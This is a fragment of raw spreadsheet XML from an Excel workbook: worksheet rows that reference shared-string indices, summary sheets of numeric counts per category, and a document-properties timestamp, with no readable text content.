      <c r="G302" s="1" t="s">
        <v>2888</v>
      </c>
      <c r="H302" s="1" t="s">
        <v>2821</v>
      </c>
    </row>
    <row r="303" spans="1:8" ht="17" x14ac:dyDescent="0.2">
      <c r="A303" t="s">
        <v>1510</v>
      </c>
      <c r="G303" s="1" t="s">
        <v>2892</v>
      </c>
      <c r="H303" s="1" t="s">
        <v>2821</v>
      </c>
    </row>
    <row r="304" spans="1:8" ht="17" x14ac:dyDescent="0.2">
      <c r="A304" t="s">
        <v>1512</v>
      </c>
      <c r="G304" s="1" t="s">
        <v>2986</v>
      </c>
      <c r="H304" s="1" t="s">
        <v>2821</v>
      </c>
    </row>
    <row r="305" spans="1:8" ht="17" x14ac:dyDescent="0.2">
      <c r="A305" t="s">
        <v>1514</v>
      </c>
      <c r="G305" s="1" t="s">
        <v>2990</v>
      </c>
      <c r="H305" s="1" t="s">
        <v>2821</v>
      </c>
    </row>
    <row r="306" spans="1:8" ht="17" x14ac:dyDescent="0.2">
      <c r="A306" t="s">
        <v>1517</v>
      </c>
      <c r="C306" s="1" t="s">
        <v>2995</v>
      </c>
      <c r="G306" s="1" t="s">
        <v>2996</v>
      </c>
      <c r="H306" s="1" t="s">
        <v>2821</v>
      </c>
    </row>
    <row r="307" spans="1:8" ht="17" x14ac:dyDescent="0.2">
      <c r="A307" t="s">
        <v>1520</v>
      </c>
      <c r="C307" s="1" t="s">
        <v>2537</v>
      </c>
      <c r="F307" t="s">
        <v>105</v>
      </c>
      <c r="G307" s="1" t="s">
        <v>3019</v>
      </c>
      <c r="H307" s="1" t="s">
        <v>3070</v>
      </c>
    </row>
    <row r="308" spans="1:8" ht="17" x14ac:dyDescent="0.2">
      <c r="A308" t="s">
        <v>1523</v>
      </c>
      <c r="C308" s="1" t="s">
        <v>2537</v>
      </c>
      <c r="F308" t="s">
        <v>105</v>
      </c>
      <c r="G308" s="1" t="s">
        <v>3076</v>
      </c>
      <c r="H308" s="1" t="s">
        <v>3109</v>
      </c>
    </row>
    <row r="309" spans="1:8" ht="17" x14ac:dyDescent="0.2">
      <c r="A309" t="s">
        <v>1524</v>
      </c>
      <c r="C309" s="1" t="s">
        <v>3072</v>
      </c>
      <c r="H309" s="1" t="s">
        <v>3109</v>
      </c>
    </row>
    <row r="310" spans="1:8" ht="17" x14ac:dyDescent="0.2">
      <c r="A310" t="s">
        <v>1526</v>
      </c>
      <c r="C310" s="1" t="s">
        <v>3077</v>
      </c>
      <c r="H310" s="1" t="s">
        <v>3109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4" sqref="A4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>
        <v>24</v>
      </c>
      <c r="C4">
        <v>64</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s">
        <v>139</v>
      </c>
      <c r="B5">
        <v>37</v>
      </c>
      <c r="C5">
        <v>69</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6" s="3" t="s">
        <v>238</v>
      </c>
      <c r="B6">
        <v>14</v>
      </c>
      <c r="C6">
        <v>28</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7" s="3" t="s">
        <v>287</v>
      </c>
      <c r="B7">
        <v>14</v>
      </c>
      <c r="C7">
        <v>25</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A8" s="3" t="s">
        <v>352</v>
      </c>
      <c r="B8">
        <v>7</v>
      </c>
      <c r="C8">
        <v>32</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A9" s="3" t="s">
        <v>391</v>
      </c>
      <c r="B9">
        <v>4</v>
      </c>
      <c r="C9">
        <v>13</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A10" s="3" t="s">
        <v>424</v>
      </c>
      <c r="B10">
        <v>27</v>
      </c>
      <c r="C10">
        <v>68</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A11" s="3" t="s">
        <v>509</v>
      </c>
      <c r="B11">
        <v>12</v>
      </c>
      <c r="C11">
        <v>21</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A12" s="3" t="s">
        <v>510</v>
      </c>
      <c r="B12">
        <v>17</v>
      </c>
      <c r="C12">
        <v>24</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A13" s="3" t="s">
        <v>540</v>
      </c>
      <c r="B13">
        <v>11</v>
      </c>
      <c r="C13">
        <v>22</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A14" s="3" t="s">
        <v>551</v>
      </c>
      <c r="B14">
        <v>15</v>
      </c>
      <c r="C14">
        <v>39</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A15" s="3" t="s">
        <v>583</v>
      </c>
      <c r="B15">
        <v>14</v>
      </c>
      <c r="C15">
        <v>27</v>
      </c>
    </row>
    <row r="16" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A16" s="3" t="s">
        <v>669</v>
      </c>
      <c r="B16">
        <v>18</v>
      </c>
      <c r="C16">
        <v>58</v>
      </c>
    </row>
    <row r="17" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A17" s="3" t="s">
        <v>676</v>
      </c>
      <c r="B17">
        <v>6</v>
      </c>
      <c r="C17">
        <v>23</v>
      </c>
    </row>
    <row r="18" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A18" s="3" t="s">
        <v>697</v>
      </c>
      <c r="B18">
        <v>25</v>
      </c>
      <c r="C18">
        <v>50</v>
      </c>
    </row>
    <row r="19" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A19" s="3" t="s">
        <v>748</v>
      </c>
      <c r="B19">
        <v>12</v>
      </c>
      <c r="C19">
        <v>27</v>
      </c>
    </row>
    <row r="20" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A20" s="3" t="s">
        <v>773</v>
      </c>
      <c r="B20">
        <v>17</v>
      </c>
      <c r="C20">
        <v>31</v>
      </c>
    </row>
    <row r="21" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A21" s="3" t="s">
        <v>810</v>
      </c>
      <c r="B21">
        <v>34</v>
      </c>
      <c r="C21">
        <v>145</v>
      </c>
    </row>
    <row r="22" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A22" s="3" t="s">
        <v>971</v>
      </c>
      <c r="B22">
        <v>4</v>
      </c>
      <c r="C22">
        <v>7</v>
      </c>
    </row>
    <row r="23" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A23" s="3" t="s">
        <v>988</v>
      </c>
      <c r="B23">
        <v>7</v>
      </c>
      <c r="C23">
        <v>23</v>
      </c>
    </row>
    <row r="24" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A24" s="3" t="s">
        <v>1030</v>
      </c>
      <c r="B24">
        <v>15</v>
      </c>
      <c r="C24">
        <v>62</v>
      </c>
    </row>
    <row r="25" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A25" s="3" t="s">
        <v>1110</v>
      </c>
      <c r="B25">
        <v>6</v>
      </c>
      <c r="C25">
        <v>24</v>
      </c>
    </row>
    <row r="26" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A26" s="3" t="s">
        <v>1128</v>
      </c>
      <c r="B26">
        <v>4</v>
      </c>
      <c r="C26">
        <v>17</v>
      </c>
    </row>
    <row r="27" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A27" s="3" t="s">
        <v>1147</v>
      </c>
      <c r="B27">
        <v>1</v>
      </c>
      <c r="C27">
        <v>10</v>
      </c>
    </row>
    <row r="28" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A28" s="3" t="s">
        <v>1172</v>
      </c>
      <c r="B28">
        <v>5</v>
      </c>
      <c r="C28">
        <v>9</v>
      </c>
    </row>
    <row r="29" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A29" s="3" t="s">
        <v>1205</v>
      </c>
      <c r="B29">
        <v>10</v>
      </c>
      <c r="C29">
        <v>33</v>
      </c>
    </row>
    <row r="30" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A30" s="3" t="s">
        <v>1216</v>
      </c>
      <c r="B30">
        <v>1</v>
      </c>
      <c r="C30">
        <v>3</v>
      </c>
    </row>
    <row r="31" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A31" s="3" t="s">
        <v>2184</v>
      </c>
      <c r="B31">
        <v>19</v>
      </c>
      <c r="C31">
        <v>69</v>
      </c>
    </row>
    <row r="32" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A32" s="3" t="s">
        <v>2327</v>
      </c>
      <c r="B32">
        <v>33</v>
      </c>
      <c r="C32">
        <v>79</v>
      </c>
    </row>
    <row r="33" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A33" s="3" t="s">
        <v>2490</v>
      </c>
      <c r="B33">
        <v>26</v>
      </c>
      <c r="C33">
        <v>55</v>
      </c>
    </row>
    <row r="34" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A34" s="3" t="s">
        <v>2620</v>
      </c>
      <c r="B34">
        <v>21</v>
      </c>
      <c r="C34">
        <v>42</v>
      </c>
    </row>
    <row r="35" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A35" s="3" t="s">
        <v>2707</v>
      </c>
      <c r="B35">
        <v>21</v>
      </c>
      <c r="C35">
        <v>58</v>
      </c>
    </row>
    <row r="36" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A36" s="3" t="s">
        <v>2821</v>
      </c>
      <c r="B36">
        <v>22</v>
      </c>
      <c r="C36">
        <v>74</v>
      </c>
    </row>
    <row r="37" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A37" s="3" t="s">
        <v>3070</v>
      </c>
      <c r="B37">
        <v>14</v>
      </c>
      <c r="C37">
        <v>33</v>
      </c>
    </row>
    <row r="38" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A38" s="3" t="s">
        <v>3110</v>
      </c>
      <c r="B38">
        <v>9</v>
      </c>
      <c r="C38">
        <v>18</v>
      </c>
    </row>
    <row r="39" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A39" s="3" t="s">
        <v>3111</v>
      </c>
      <c r="B39">
        <v>4</v>
      </c>
      <c r="C39">
        <v>9</v>
      </c>
    </row>
    <row r="40" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A40" s="3" t="s">
        <v>73</v>
      </c>
      <c r="B40">
        <v>530</v>
      </c>
      <c r="C40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4"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A20" sqref="A20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C4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s">
        <v>139</v>
      </c>
      <c r="C5">
        <v>5</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6" s="3" t="s">
        <v>238</v>
      </c>
      <c r="C6">
        <v>2</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7" s="3" t="s">
        <v>287</v>
      </c>
      <c r="C7">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A8" s="3" t="s">
        <v>551</v>
      </c>
      <c r="C8">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A9" s="3" t="s">
        <v>697</v>
      </c>
      <c r="C9">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A10" s="3" t="s">
        <v>988</v>
      </c>
      <c r="C10">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A11" s="3" t="s">
        <v>2327</v>
      </c>
      <c r="C11">
        <v>2</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A12" s="3" t="s">
        <v>2620</v>
      </c>
      <c r="C12">
        <v>4</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A13" s="3" t="s">
        <v>2821</v>
      </c>
      <c r="C13">
        <v>2</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A14" s="3" t="s">
        <v>73</v>
      </c>
      <c r="C1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2025-06-19T19:58:25Z</dcterms:modified>
</cp:coreProperties>
</file>